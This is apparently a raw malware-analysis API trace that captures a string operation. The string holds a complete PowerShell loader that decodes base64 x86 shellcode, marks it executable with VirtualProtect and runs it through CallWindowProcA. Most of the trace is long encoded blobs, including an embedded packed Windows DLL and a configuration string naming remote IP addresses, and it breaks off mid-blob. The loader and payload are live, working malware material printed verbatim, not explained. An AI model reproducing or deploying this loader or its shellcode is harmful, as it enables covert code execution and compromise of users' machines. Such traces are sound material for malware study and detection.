moIZggKWGII8A7FhWoRTgLgEAVolF2PwgWg7AjQHUUFM1FscaRfDMDQAKCYChmCDgQEDFFnXkiXXo/yYVDHkCix2mDBEp8GLeQ+HRAMEKdfzpAlRSh0Cx+GCkNwANi0VNDIUn/w8lEYAwXWoBN91uEMORIBLKJuCP8DfIzuJrITP/uUAw3QCD+AV0BblAgCQw1ViFLzUF5Gv4IFNTU1EzyYJs8EAZHBicJxG1GifHGic6FSc0FScQJDAfJ4EBDgcQJ4/QRa6fAHEyjVkCV4tFOhTQcANVAQCaQQApAyA783Qy/0R1KQUM6OJhEnX0GlZqBtkG+TIMmhaCBgRgaQD331Mb/1YPR/8VjOUlcFA8EapCCRKLxz4AwlBhQo5PgsvgrWGLHeEfVldguuUYFQ7KjbwkGIS1AvOqjYQgAoUGRCwjEHwkFIlUJBkU6CtCA9CAEAGIORAAjbQcUlfgi1MABgPxixyyIWJDAQAQjVABighAhADJdfkrwo10BkYBTAGFDhvjUFwQQUgjV1b/00kMg/gBAXTNaIDuNrYV9aGwAGBqMEIbIZZBVhvlK9CGCh0hZLVYIyowYhtjDSyjUSDUiBTgpQhhAUQo3RIQrOJRsIRO5x4koKkRFR+hDgCxUzDZ/VF3obyBaFDVAKQGCApWi0QkCGnAgQ4WoQZQgCQIkyYAk4BgYgD6BkAHofYPr/gB5RwYkMaBBj5JMKl4UcZW3g5QwdJtUAYwLZRQagkC3QiAhiR3AW1SAhRqAGgzEeEAP/PKCBHZkiQABfUaUIQDGzPAQOIXkTsQVR+iLzBjB2UFHTIPhS15BckX7GQTGdAPgNoCYVYA6FCAhQSL2Ild/IP7Cf8PhPxwYHUFOoixAgA7HbIZMae0GDGfZt8qsWjIpKQBIjsFoRAPhMwRGyoQjb5QTPB/818hBCP1ESqNtlQ8YaMoAUA3iz12AHJNBNcJ6wb/BUUQads1EAsywI276RO5MNGLEAgjvpgSABC5MRkK86SLDQUVar0WjRm7TJNwEFPROOjFEZx0UMNfIVEbI/AAAP8R1mg" [0035.915] strncat (in: _Dest="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"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", _Source="\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", _Count=0x562d | out: _Dest="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"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